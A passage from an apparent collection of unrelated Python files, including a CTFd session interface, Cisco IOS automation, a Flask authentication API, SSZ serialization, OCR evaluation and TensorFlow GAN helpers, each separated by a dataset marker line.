SlimerJS = "SlimerJS"
Nashorn = "Nashorn"
Deno = "Deno"
|
nilq/baby-python
|
python
|
from flask.sessions import SessionInterface, SessionMixin
from flask.json.tag import TaggedJSONSerializer
from werkzeug.datastructures import CallbackDict
from itsdangerous import BadSignature, want_bytes
from CTFd.cache import cache
from CTFd.utils import text_type
from CTFd.utils.security.signing import sign, unsign
from uuid import uuid4
import six
def total_seconds(td):
    """Whole seconds represented by timedelta *td* (microseconds ignored)."""
    return td.seconds + 86400 * td.days
class CachedSession(CallbackDict, SessionMixin):
    """
    This code is mostly based off of the ServerSideSession from Flask-Session.
    https://github.com/fengsp/flask-session/blob/master/flask_session/sessions.py#L37
    """
    def __init__(self, initial=None, sid=None, permanent=None):
        # on_update is invoked by CallbackDict whenever the mapping mutates,
        # marking the session dirty so the interface knows to persist it.
        # NOTE: inside the callback, ``self`` is the dict being updated.
        def on_update(self):
            self.modified = True
        CallbackDict.__init__(self, initial, on_update)
        self.sid = sid  # server-side session id (cache key suffix)
        if permanent:
            self.permanent = permanent
        self.modified = False  # fresh sessions start clean
    def regenerate(self):
        # Drop the cached server-side copy -- presumably a session-fixation
        # defence after privilege changes; confirm with callers.
        cache.delete(self.sid)
        # Empty current sid and mark modified so the interface will give it a new one.
        self.sid = None
        self.modified = True
class CachingSessionInterface(SessionInterface):
    """
    This code is partially based off of the RedisSessionInterface from Flask-Session with updates to properly
    interoperate with Flask-Caching and be more inline with modern Flask (i.e. doesn't use pickle).
    https://github.com/fengsp/flask-session/blob/master/flask_session/sessions.py#L90
    """
    # JSON-based serializer (the same tagged serializer Flask uses for cookies).
    serializer = TaggedJSONSerializer()
    session_class = CachedSession
    def _generate_sid(self):
        # Random, unguessable session id.
        return str(uuid4())
    def __init__(self, key_prefix, use_signer=True, permanent=False):
        self.key_prefix = key_prefix  # namespace prefix for cache keys
        self.use_signer = use_signer  # sign the sid stored in the cookie
        self.permanent = permanent    # default permanence of new sessions
    def open_session(self, app, request):
        """Load the session matching the request cookie, or start a fresh one."""
        sid = request.cookies.get(app.session_cookie_name)
        if not sid:
            # No cookie at all: issue a brand-new empty session.
            sid = self._generate_sid()
            return self.session_class(sid=sid, permanent=self.permanent)
        if self.use_signer:
            try:
                sid_as_bytes = unsign(sid)
                sid = sid_as_bytes.decode()
            except BadSignature:
                # Tampered or forged cookie: discard it and start over.
                sid = self._generate_sid()
                return self.session_class(sid=sid, permanent=self.permanent)
        if not six.PY2 and not isinstance(sid, text_type):
            sid = sid.decode("utf-8", "strict")
        val = cache.get(self.key_prefix + sid)
        if val is not None:
            try:
                data = self.serializer.loads(val)
                return self.session_class(data, sid=sid)
            except Exception:
                # Corrupt/undecodable payload: fall back to an empty session
                # that keeps the same sid.
                return self.session_class(sid=sid, permanent=self.permanent)
        return self.session_class(sid=sid, permanent=self.permanent)
    def save_session(self, app, session, response):
        """Persist the session to the cache and set (or delete) the cookie."""
        domain = self.get_cookie_domain(app)
        path = self.get_cookie_path(app)
        if not session:
            # Session was emptied this request: purge the server-side copy
            # and clear the client cookie.
            if session.modified:
                cache.delete(self.key_prefix + session.sid)
                response.delete_cookie(
                    app.session_cookie_name, domain=domain, path=path
                )
            return
        if session.modified:
            httponly = self.get_cookie_httponly(app)
            secure = self.get_cookie_secure(app)
            expires = self.get_expiration_time(app, session)
            samesite = self.get_cookie_samesite(app)
            val = self.serializer.dumps(dict(session))
            if session.sid is None:
                # sid was cleared by CachedSession.regenerate(); issue a new one.
                session.sid = self._generate_sid()
            cache.set(
                key=self.key_prefix + session.sid,
                value=val,
                timeout=total_seconds(app.permanent_session_lifetime),
            )
            if self.use_signer:
                session_id = sign(want_bytes(session.sid))
            else:
                session_id = session.sid
            response.set_cookie(
                app.session_cookie_name,
                session_id,
                expires=expires,
                httponly=httponly,
                domain=domain,
                path=path,
                secure=secure,
                samesite=samesite,
            )
|
nilq/baby-python
|
python
|
import math
# Print i^3 + 2*i for i = 1..n. math.pow returns a float, so the printed
# values are floats (e.g. 3.0, 12.0, ...).
# NOTE(review): the prompt string contains a typo ("ius" -> "is"); left
# unchanged here because it is runtime output.
n = int(input("Enter the number till where the series ius to be printed = "))
for i in range(1,n+1):
    k = math.pow(i,3)
    j = k + 2*i
    print(j)
|
nilq/baby-python
|
python
|
#Write a function that prompts user to input his/her full name.
#After user enter's his/her full name, split it and store it in variables first_name and last_name.
# NOTE(review): ``count`` and ``k`` are never used; a single-word name
# raises IndexError at s[1] -- confirm input is always 2-3 words.
count=0
k=0
name=str(input("Enter your full name: "))
s=name.split(" ")
print("The first name is:",s[0])
if len(s)==3:
    # Three words: first / middle / last.
    print("The middle name is:",s[1])
    print("The last name is:", s[2])
else:
    print("The last name is:", s[1])
|
nilq/baby-python
|
python
|
from typing import Tuple, Optional
from abc import ABC, abstractmethod
from mercury.msg.smart_grid import ElectricityOffer
from xdevs.models import Atomic, Port, PHASE_PASSIVE, INFINITY
from mercury.utils.history_buffer import EventHistoryBuffer
class EnergyProvider(Atomic, ABC):
    """xDEVS atomic model that publishes electricity price offers for one provider."""
    def __init__(self, **kwargs):
        self.provider_id: str = kwargs['provider_id']  # mandatory provider name
        self.actual_offer: Optional[float] = None      # offer currently in force
        self.eventual_offer: Optional[float] = None    # next offer to publish
        self.next_timeout: float = INFINITY            # time until next publication
        self._clock: float = 0                         # local simulation-time tracker
        super().__init__('smart_grid_provider_{}'.format(self.provider_id))
        self.out_electricity_offer = Port(ElectricityOffer, 'out_electricity_offer')
        self.add_out_port(self.out_electricity_offer)
    def deltint(self):
        # Internal transition: commit the pending offer and schedule the next one.
        self._clock += self.sigma
        self.actual_offer = self.eventual_offer
        self.eventual_offer, self.next_timeout = self.schedule_next_offer()
        self.hold_in(PHASE_PASSIVE, self.next_timeout)
    def deltext(self, e):
        # External transition: advance the clock; keep the remaining schedule.
        self._clock += e
        self.next_timeout -= e
        self.hold_in(PHASE_PASSIVE, self.next_timeout)
    def lambdaf(self):
        # Output function: emit the offer that is about to take effect.
        self.out_electricity_offer.add(ElectricityOffer(self.provider_id, self.eventual_offer))
    def initialize(self):
        # Fire immediately so the initial offer is published at t = 0.
        self.hold_in(PHASE_PASSIVE, 0)
    def exit(self):
        pass
    def get_next_timeout(self):
        return self.next_timeout
    @abstractmethod
    def schedule_next_offer(self) -> Tuple[Optional[float], float]:
        """:return: tuple (new eventual offer, time to wait before publishing new offer)"""
        pass
class EnergyProviderStatic(EnergyProvider):
    """Provider whose offer never changes after the initial value."""
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # 'offer' is published once at t=0 and then held forever.
        self.eventual_offer = kwargs.get('offer', None)
    def schedule_next_offer(self) -> Tuple[Optional[float], float]:
        # Keep the current offer and never wake up again.
        return self.actual_offer, INFINITY
class EnergyProviderHistory(EnergyProvider):
    """Provider that replays offers from a recorded event-history buffer."""
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.offer_column = kwargs.get('offer_column', 'offer')  # column holding the price
        self.buffer = EventHistoryBuffer(**kwargs)
        if not self.buffer.column_exists(self.offer_column):
            raise ValueError('dataframe does not have the mandatory column {}'.format(self.offer_column))
        self.eventual_offer = self.buffer.initial_val[self.offer_column].item()
    def schedule_next_offer(self) -> Tuple[float, float]:
        # Advance through the history until the price actually changes
        # (or the buffer is exhausted, i.e. next_time reaches INFINITY).
        eventual = self.actual_offer
        next_time = self._clock
        while eventual == self.actual_offer and next_time < INFINITY:
            eventual = self.buffer.get_event()[self.offer_column].item()
            next_time = self.buffer.time_of_next_event()
            self.buffer.advance()
        return eventual, next_time - self._clock
|
nilq/baby-python
|
python
|
from abc import abstractmethod
from dataclasses import dataclass
from typing import List, Any, Callable, Dict, Tuple, NamedTuple, Union
from data_splitting import split_splits, LearnCurveJob, EvalJob
from seq_tag_util import calc_seqtag_f1_scores, Sequences
from util.worker_pool import GenericTask
@dataclass
class Experiment:
    """Description of one learning-curve experiment run."""
    name: str
    num_folds: int
    jobs: List[LearnCurveJob]
    score_task: GenericTask
    def __str__(self):
        # Exclude the (potentially long) jobs list from the printed form.
        return str({k: v for k, v in self.__dict__.items() if k not in ["jobs"]})
# Mapping from split name (e.g. "train"/"test") to example indices.
Splits = Dict[str, List[int]]
class SeqTagTaskData(NamedTuple):
    """Bundle of raw per-split data plus task-specific auxiliary data."""
    data: Dict[str, List]
    task_data: Any
class SeqTagScoreTask(GenericTask):
    """Worker-pool task that evaluates a sequence tagger with per-split F1 scores."""
    def __init__(self, params, data_supplier: Callable) -> None:
        task_params = {"params": params, "data_supplier": data_supplier}
        super().__init__(**task_params)
    @staticmethod
    @abstractmethod
    def build_task_data(**task_params) -> SeqTagTaskData:
        """Build the dataset plus auxiliary task data; implemented by subclasses."""
        raise NotImplementedError
    @classmethod
    def process(cls, job: EvalJob, task_data: SeqTagTaskData):
        """Split the data per *job*, predict, and return F1 scores per split."""
        splits = split_splits(job, task_data.data)
        predictions = cls.predict_with_targets(splits, task_data.task_data)
        return {
            split_name: calc_seqtag_f1_scores(preds, targets)
            for split_name, (preds, targets) in predictions.items()
        }
    @classmethod
    @abstractmethod
    def predict_with_targets(
        cls, splits: Splits, params
    ) -> Dict[str, Tuple[Sequences, Sequences]]:
        """Return {split_name: (predictions, targets)}; implemented by subclasses."""
        raise NotImplementedError
|
nilq/baby-python
|
python
|
from SeeThru_Feeds.Model.Attribution import Attribution
from SeeThru_Feeds.Model.Properties.Properties import *
from SeeThru_Feeds.Model.Properties.PropertyManager import PropertyManager
class ComponentBase(PropertyManager, Attribution):
    """Base class for components: validates fillable properties, then executes."""
    def component_execute(self):
        """
        This function should be overridden by a subclass
        This is where your component should start executing
        Raises:
            NotImplementedError: There is no execution method defined, please define it with 'component_execute'
        """
        raise NotImplementedError("There is no execution method defined, please define it with 'component_execute'")
    def run(self):
        """
        This method will call the sub class' component_execute method
        This is the only way a component should be executed as it
        ensures that the properties of the component are valid
        Returns:
            ComponentBase: The component
        """
        self.check_fillables()
        # The fillable properties passed their parsing, therefore the component can be executed
        self.component_execute()
        return self
|
nilq/baby-python
|
python
|
'''
Copyright 2021 Kyle Kowalczyk
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from CiscoAutomationFramework.FirmwareBase import CiscoFirmware
from time import sleep
class IOS(CiscoFirmware):
    """CiscoFirmware implementation for classic IOS devices.

    Every accessor drives the device over ``self.transport``, first entering
    privileged-exec mode and disabling terminal paging.
    """

    @property
    def uptime(self):
        """Uptime string parsed from 'show version', or None if not found."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        device_output = self.transport.send_command_get_output('show version')
        for line in device_output.splitlines():
            if f'{self.transport.hostname.lower()} uptime' in line.lower():
                # Drop "<hostname> uptime is" and keep the remainder.
                return ' '.join(line.split()[3:])
        return None

    @property
    def interfaces(self):
        """Interface names parsed from 'show interfaces'."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        raw_data = self.transport.send_command_get_output('show interfaces', buffer_size=500)
        try:
            # Interface header lines start at column 0; indented continuation
            # lines are skipped.
            parsed_data = [x.split()[0] for x in raw_data[2:-2] if not x.startswith(' ')]
        except IndexError as _:
            raise IndexError('Unexpected data from device, Unable to extract interface names from "show interfaces" command!')
        return parsed_data

    @property
    def mac_address_table(self):
        """MAC address table output with banner/footer lines trimmed."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        raw_mac = self.transport.send_command_get_output('show mac address-table')
        return '\n'.join(raw_mac[6:-2])

    @property
    def arp_table(self):
        """ARP table output with banner/footer lines trimmed."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        raw_arp = self.transport.send_command_get_output('show ip arp')
        return '\n'.join(raw_arp[2:-1])

    @property
    def running_config(self):
        """Full running configuration as a single string."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        running_config = self.transport.send_command_get_output('show running-config', buffer_size=100)
        # if the running config grabbed is less than 4 lines and the prompt is not in the last 4 lines of the config,
        # keep pulling output until the device prompt appears.
        # Idiom fix: any(<gen>) replaces any([True if ... else False ...]).
        while len(running_config) < 4 and not any(self.prompt in x for x in reversed(running_config[-4:])):
            running_config += self.transport.get_output(buffer_size=100, no_command_sent_previous=True)
            sleep(.1)
        return '\n'.join(running_config[2:-2])

    @property
    def startup_config(self):
        """Full startup configuration as a single string."""
        self.cli_to_privileged_exec_mode()
        self.terminal_length('0')
        config = self.transport.send_command_get_output('show startup-config', buffer_size=100)
        while len(config) < 4 and not any(self.prompt in x for x in reversed(config[-4:])):
            config += self.transport.get_output(buffer_size=100, no_command_sent_previous=True)
            sleep(.1)
        return '\n'.join(config[2:-2])

    def _terminal_length(self, n='0'):
        self.cli_to_privileged_exec_mode()
        return self.transport.send_command_get_output(f'terminal length {n}')

    def _terminal_width(self, n='0'):
        self.cli_to_privileged_exec_mode()
        return self.transport.send_command_get_output(f'terminal width {n}')

    def save_config(self):
        """Copy running-config to startup-config; True on apparent success."""
        self.cli_to_privileged_exec_mode()
        self.transport.send_command('copy running-config startup-config')
        data = self.transport.send_command_get_output('', timeout=15)
        # if the prompt is in the last line of output and there is not a percent sign in any line of output we will
        # interpret that as a succesful save
        # NOTE(review): this uses self.transport.prompt while the config
        # readers use self.prompt -- confirm both refer to the same value.
        if self.transport.prompt in ''.join(data[-1:]) and not any('%' in line for line in data):
            return True
        return False

    def add_local_user(self, username, password, password_code=0, *args, **kwargs):
        """Create a local user; extra args/kwargs are spliced into the command."""
        kwarg_string = ' '.join([f'{key} {value}' for key, value in kwargs.items()])
        command_string = f'username {username} {" ".join(args)} {kwarg_string} secret {password_code} {password}'
        self.cli_to_config_mode()
        return self.transport.send_command_get_output(command_string)

    def delete_local_user(self, username):
        """Remove a local user account."""
        self.cli_to_config_mode()
        self.transport.send_command(f'no username {username}')
        return self.transport.send_command_get_output('')
|
nilq/baby-python
|
python
|
# Copyright (c) 2019, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from flask import request
from flask_restx import Namespace, Resource
from .. import CC, apiserver_config
from ..core.data_models import user_login_model, user_register_model, error_model, auth_token_resp_model, \
user_settings_resp_model, user_registration_resp_model
from ..core.decorators import auth_required
auth_route = apiserver_config['routes']['user']
auth_api = Namespace(auth_route, description='Authentication service')
@auth_api.route('')
class Auth(Resource):
    # Simple liveness check for the user route.
    # NOTE(review): three Resource classes in this module reuse the name
    # "Auth"; flask_restx registers each route at decoration time, so the
    # later definitions presumably only shadow the module-level name --
    # confirm routing still behaves as intended.
    def get(self):
        return {"message": "user route is working"}, 200
@auth_api.route('/<study_name>/register')
class Auth(Resource):
    @auth_api.doc('')
    @auth_api.expect(user_register_model(auth_api), validate=True)
    @auth_api.response(400, 'All fields are required.', model=error_model(auth_api))
    @auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
    @auth_api.response(200, 'User registration successful.', model=user_registration_resp_model(auth_api))
    def post(self, study_name):
        '''Post required fields (username, password, user_role, user_metadata, user_settings) to register a user'''
        try:
            username = request.get_json().get('username', None).strip()
            user_password = request.get_json().get('password', None).strip()
            #study_name = request.get_json().get('study_name', None).strip()
            user_role = request.get_json().get('user_role', None).strip()
            user_metadata = request.get_json().get('user_metadata', None)
            user_settings = request.get_json().get('user_settings', None)
            status = CC.get_or_create_instance(study_name=study_name).create_user(username, user_password, user_role, user_metadata, user_settings, encrypt_password=True)
            if status:
                return {"message": str(username) + " is created successfully."}, 200
            else:
                return {"message": "Cannot create, something went wrong."}, 400
        except Exception as err:
            # Cleanup: the original "except (ValueError, Exception)" was
            # redundant -- Exception already subsumes ValueError. Note that
            # .strip() on a missing field raises AttributeError, which also
            # lands here and is reported as a 400.
            return {"message": str(err)}, 400
@auth_api.route('/<study_name>/login')
class Auth(Resource):
    @auth_api.doc('')
    @auth_api.expect(user_login_model(auth_api), validate=True)
    @auth_api.response(400, 'User name and password cannot be empty.', model=error_model(auth_api))
    @auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
    @auth_api.response(200, 'Authentication is approved', model=auth_token_resp_model(auth_api))
    def post(self, study_name):
        """
        authenticate a user
        """
        username = request.get_json().get('username', None)
        password = request.get_json().get('password', None)
        if not username or not password:
            return {"message": "User name and password cannot be empty."}, 401
        login_status = CC.get_or_create_instance(study_name=study_name).connect(username, password, encrypt_password=True)
        if login_status.get("status", False) == False:
            # Authentication rejected: propagate the backend's message.
            return {"message": login_status.get("msg", "no-message-available")}, 401
        # Success: return the auth token plus the user's uuid.
        token = login_status.get("auth_token")
        user_uuid = CC.get_or_create_instance(study_name=study_name).get_user_id(username)
        access_token = {"auth_token": token, 'user_uuid': user_uuid}
        return access_token, 200
@auth_api.route('/<study_name>/config')
class Auth(Resource):
    @auth_api.doc('')
    @auth_required
    @auth_api.header("Authorization", 'Bearer <JWT>', required=True)
    @auth_api.response(400, 'Authorization code cannot be empty.', model=error_model(auth_api))
    @auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
    @auth_api.response(200, 'Request successful', model=user_settings_resp_model(auth_api))
    def get(self, study_name):
        '''Return the authenticated user's settings for the given study.'''
        # Strip the "Bearer " prefix to obtain the raw JWT.
        token = request.headers['Authorization']
        token = token.replace("Bearer ", "")
        try:
            user_settings = CC.get_or_create_instance(study_name=study_name).get_user_settings(auth_token=token)
            return {"user_settings": json.dumps(user_settings)}
        except Exception as e:
            # BUG FIX: the original returned {"message", str(e)} -- a *set*
            # literal (not JSON-serializable) instead of the intended dict.
            return {"message": str(e)}, 400
|
nilq/baby-python
|
python
|
import pytesseract
import jiwer
from PIL import Image
from os import listdir
from os.path import join, isfile
TEST_PATH = '/train/tesstrain/data/storysquad-ground-truth'
extractions = []    # OCR output per image
ground_truths = []  # matching .gt.txt contents (None when the file is missing)
count = 0
# OCR at most 100 PNGs from the ground-truth directory using the custom
# 'kaggle' traineddata, collecting predictions and references in parallel lists.
for file_name in listdir(TEST_PATH):
    file_path = join(TEST_PATH, file_name)
    if count < 100 and file_path.endswith(".png") and isfile(file_path):
        extraction = pytesseract.image_to_string(
            Image.open(file_path),
            lang='kaggle',
            config='--tessdata-dir "/train/tessdata"' # set in top level Dockerfile on L72
        )
        ground_truth = None
        ground_truth_path = file_path.replace(".png", ".gt.txt")
        if isfile(ground_truth_path):
            with open(ground_truth_path, mode='r') as f:
                ground_truth = f.read()
        extractions.append(extraction)
        ground_truths.append(ground_truth)
        count += 1
    else:
        continue
# Corpus-level word and character error rates via jiwer.
word_error_rate = jiwer.wer(
    ground_truths,
    extractions,
)
print(f"Model had word error rate of {100 * word_error_rate}%")
char_error_rate = jiwer.cer(
    ground_truths,
    extractions,
)
print(f"Model had char error rate of {100 *char_error_rate}%")
|
nilq/baby-python
|
python
|
from typing import (
IO,
Any,
Iterable,
Sequence,
Tuple,
)
from eth_utils import (
ValidationError,
to_tuple,
)
from eth_utils.toolz import (
sliding_window,
)
from ssz.exceptions import (
DeserializationError,
SerializationError,
)
from ssz.sedes.base import (
CompositeSedes,
TSedes,
)
from ssz.utils import (
merkleize,
read_exact,
s_decode_offset,
)
@to_tuple
def _deserialize_fixed_size_items_and_offsets(stream, field_sedes):
    """Walk the fixed-size region of *stream*, yielding per field either
    (decoded value, sedes) for fixed-size fields or (offset, sedes) for
    variable-size ones."""
    for sedes in field_sedes:
        if sedes.is_fixed_sized:
            field_size = sedes.get_fixed_size()
            field_data = read_exact(field_size, stream)
            yield (sedes.deserialize(field_data), sedes)
        else:
            # Variable-size fields contribute an offset read from the stream.
            yield (s_decode_offset(stream), sedes)
class Container(CompositeSedes[Sequence[Any], Tuple[Any, ...]]):
    """SSZ sedes for a container of heterogeneous, statically ordered fields."""
    def __init__(self, field_sedes: Sequence[TSedes]) -> None:
        if len(field_sedes) == 0:
            raise ValidationError("Cannot define container without any fields")
        self.field_sedes = tuple(field_sedes)
    #
    # Size
    #
    @property
    def is_fixed_sized(self) -> bool:
        # A container is fixed-size only if every field is.
        return all(field.is_fixed_sized for field in self.field_sedes)
    def get_fixed_size(self) -> int:
        if not self.is_fixed_sized:
            raise ValueError("Container contains dynamically sized elements")
        return sum(field.get_fixed_size() for field in self.field_sedes)
    #
    # Serialization
    #
    def _get_item_sedes_pairs(self,
                              value: Sequence[Any],
                              ) -> Tuple[Tuple[Any, TSedes], ...]:
        # Pair each element with the sedes for its position.
        return tuple(zip(value, self.field_sedes))
    # NOTE: return annotation corrected from ``-> bytes``; this validator
    # returns nothing -- it only raises on a field-count mismatch.
    def _validate_serializable(self, value: Sequence[Any]) -> None:
        if len(value) != len(self.field_sedes):
            raise SerializationError(
                f"Incorrect element count: Expected: {len(self.field_sedes)} / Got: {len(value)}"
            )
    #
    # Deserialization
    #
    # NOTE: annotation corrected -- the method returns a 2-tuple of
    # (fixed-size values, (offset, sedes) pairs), not an Iterable of pairs.
    def deserialize_fixed_size_parts(self,
                                     stream: IO[bytes],
                                     ) -> Tuple[Tuple[Any, ...], Tuple[Tuple[int, TSedes], ...]]:
        """Split the fixed-size region into decoded fixed-size values and
        (offset, sedes) pairs for the variable-size fields."""
        fixed_items_and_offets = _deserialize_fixed_size_items_and_offsets(
            stream,
            self.field_sedes,
        )
        fixed_size_values = tuple(
            item
            for item, sedes
            in fixed_items_and_offets
            if sedes.is_fixed_sized
        )
        offset_pairs = tuple(
            (item, sedes)
            for item, sedes
            in fixed_items_and_offets
            if not sedes.is_fixed_sized
        )
        return fixed_size_values, offset_pairs
    @to_tuple
    def deserialize_variable_size_parts(self,
                                        offset_pairs: Tuple[Tuple[int, TSedes], ...],
                                        stream: IO[bytes]) -> Iterable[Any]:
        """Decode the variable-size fields; each field's length is the gap
        between consecutive offsets."""
        offsets, fields = zip(*offset_pairs)
        *head_fields, last_field = fields
        for sedes, (left_offset, right_offset) in zip(head_fields, sliding_window(2, offsets)):
            field_length = right_offset - left_offset
            field_data = read_exact(field_length, stream)
            yield sedes.deserialize(field_data)
        # simply reading to the end of the current stream gives us all of the final element data
        final_field_data = stream.read()
        yield last_field.deserialize(final_field_data)
    def _deserialize_stream(self, stream: IO[bytes]) -> Tuple[Any, ...]:
        """Deserialize a full container, re-interleaving fixed- and
        variable-size values back into declaration order."""
        if not self.field_sedes:
            # TODO: likely remove once
            # https://github.com/ethereum/eth2.0-specs/issues/854 is resolved
            return tuple()
        fixed_size_values, offset_pairs = self.deserialize_fixed_size_parts(stream)
        if not offset_pairs:
            return fixed_size_values
        variable_size_values = self.deserialize_variable_size_parts(offset_pairs, stream)
        fixed_size_parts_iter = iter(fixed_size_values)
        variable_size_parts_iter = iter(variable_size_values)
        value = tuple(
            next(fixed_size_parts_iter) if sedes.is_fixed_sized else next(variable_size_parts_iter)
            for sedes
            in self.field_sedes
        )
        # Verify that both iterables have been fully consumed.
        try:
            next(fixed_size_parts_iter)
        except StopIteration:
            pass
        else:
            raise DeserializationError("Did not consume all fixed size values")
        try:
            next(variable_size_parts_iter)
        except StopIteration:
            pass
        else:
            raise DeserializationError("Did not consume all variable size values")
        return value
    #
    # Tree hashing
    #
    def hash_tree_root(self, value: Tuple[Any, ...]) -> bytes:
        """Merkleize the per-field tree roots."""
        merkle_leaves = tuple(
            sedes.hash_tree_root(element)
            for element, sedes in zip(value, self.field_sedes)
        )
        return merkleize(merkle_leaves)
|
nilq/baby-python
|
python
|
import pytest
from lendingblock.const import Side, OrderType, Ccy
@pytest.fixture
async def wallets_org_id(lb, org_id):
    """Fixture: create BTC/ETH/LND wallets for the organization, return its id."""
    for ccy in Ccy.BTC.name, Ccy.ETH.name, Ccy.LND.name:
        await lb.execute(
            f'organizations/{org_id}/wallets',
            'POST',
            json={
                'address': f'{org_id}{ccy}',
                'currency': ccy,
            }
        )
    return org_id
@pytest.fixture
async def order_id(lb, wallets_org_id):
    """Fixture: place a limit lend order and return its id."""
    order_data = {
        'org_id': wallets_org_id,
        'type': OrderType.limit.name,
        'side': Side.lend.name,
        'tenor': '1d',
        'amount': 10.0,
        'currency': Ccy.BTC.name,
        'price': 2.0,
    }
    order = await lb.execute('orders', 'POST', json=order_data)
    return order['id']
async def test_create(lb, wallets_org_id):
    """Creating an order via the client API yields an order id."""
    order_data = {
        'org_id': wallets_org_id,
        'type': OrderType.limit.name,
        'side': Side.lend.name,
        'tenor': '1d',
        'amount': 10.0,
        'currency': Ccy.BTC.name,
        'price': 2.0,
    }
    resp = await lb.orders.create(order_data)
    assert 'id' in resp
async def test_get(lb, order_id):
    """Fetching an order by id returns that order."""
    resp = await lb.orders.get(order_id)
    assert resp['id'] == order_id
async def test_get_list(lb, order_id):
    """The order list contains the freshly created order."""
    resp = await lb.orders.get_list()
    assert order_id in [order['id'] for order in resp]
async def test_delete(lb, order_id):
    """Deleting an order removes it from the order list."""
    await lb.orders.delete(order_id)
    all_orders = await lb.execute('orders')
    assert order_id not in all_orders
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import tensorflow as tf
import scipy
import cPickle
import os
import glob
import random
import imageio
import scipy.misc as misc
# --- Session / model hyper-parameters -------------------------------------
log_device_placement = True
allow_soft_placement = True
gpu_options = 0.9 #multi-gpu
batch_size = 50
# Flattened image size; presumably 28x28 MNIST-style inputs -- confirm.
image_shape = [28*28]
z_dim = 30 #latent space reprsentation z proposed in the paper
gf_dim = 16
df_dim = 16
lr = 0.005  # learning rate
beta1 = 0.5  # presumably the Adam optimizer's beta1 -- confirm where used
def batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope="batch_norm"):
    """Batch normalization via tf.contrib.layers (TensorFlow 1.x API)."""
    out = tf.contrib.layers.batch_norm(x, decay=decay, updates_collections=None, epsilon=epsilon,
                        scale=True, is_training=is_training, scope=scope)
    return out
def conv(x, filter_size, stride_width, stride_height, feature_in, feature_out, scope="conv2d", log_device_placement=True):
    """2-D convolution with SAME padding plus a learned bias.

    NOTE(review): ``log_device_placement`` is accepted but never used;
    kept only for interface compatibility.
    """
    with tf.variable_scope(scope):
        kernel = tf.get_variable(
            "w",
            [filter_size, filter_size, feature_in, feature_out],
            initializer=tf.truncated_normal_initializer(stddev=0.02),
        )
        bias = tf.get_variable("b", [feature_out], initializer=tf.constant_initializer(0.0))
        strides = [1, stride_width, stride_height, 1]
        return tf.nn.conv2d(x, kernel, strides=strides, padding='SAME') + bias
def deconv(x, filter_size, stride_width, stride_height, feature_out, scope="deconv2d",log_device_placement=True):
    """Transposed 2-D convolution ("deconvolution") with a learned bias.

    ``feature_out`` is the full output shape [batch, height, width, channels].
    NOTE(review): ``log_device_placement`` is accepted but never used.
    """
    with tf.variable_scope(scope):
        w = tf.get_variable("w", [filter_size, filter_size, feature_out[-1], x.get_shape()[-1]],
                        initializer=tf.truncated_normal_initializer(stddev=0.02))
        # Bug fix: the original spelled tf.constant_intializer, which raised
        # AttributeError the moment this function was called.
        b = tf.get_variable("b", [feature_out[-1]], initializer=tf.constant_initializer(0.0))
        deconv = tf.nn.conv2d_transpose(x, w, strides=[1, stride_width, stride_height, 1], output_shape=feature_out) + b
        return deconv
def leakyrelu(x, leak=0.2, name='lrelu'):
    """Leaky ReLU written as a linear combination of x and |x|.

    Yields x for x >= 0 and ``leak * x`` for x < 0.
    """
    with tf.variable_scope(name):
        pos_coeff = 0.5 * (1 + leak)
        neg_coeff = 0.5 * (1 - leak)
        return pos_coeff * x + neg_coeff * abs(x)
def fc_layer(x, feature_in, feature_out, scope=None, with_w = False):
    """Fully connected layer computing ``x @ W + b``.

    Returns the activation alone, or ``(activation, weights, bias)``
    when ``with_w`` is true.
    """
    with tf.variable_scope(scope or "Linear"):
        weights = tf.get_variable(
            "weights", shape=[feature_in, feature_out], dtype=tf.float32,
            initializer=tf.truncated_normal_initializer(stddev=0.02))
        bias = tf.get_variable(
            "bias", shape=[feature_out], dtype=tf.float32,
            initializer=tf.constant_initializer(0.0))
        activation = tf.matmul(x, weights) + bias
        if with_w:
            return activation, weights, bias
        return activation
def init_embedding(size, dimension, stddev=0.01, scope="Embedding"):
    """Create an embedding variable "E" of shape [size, 1, 1, dimension]."""
    with tf.variable_scope(scope):
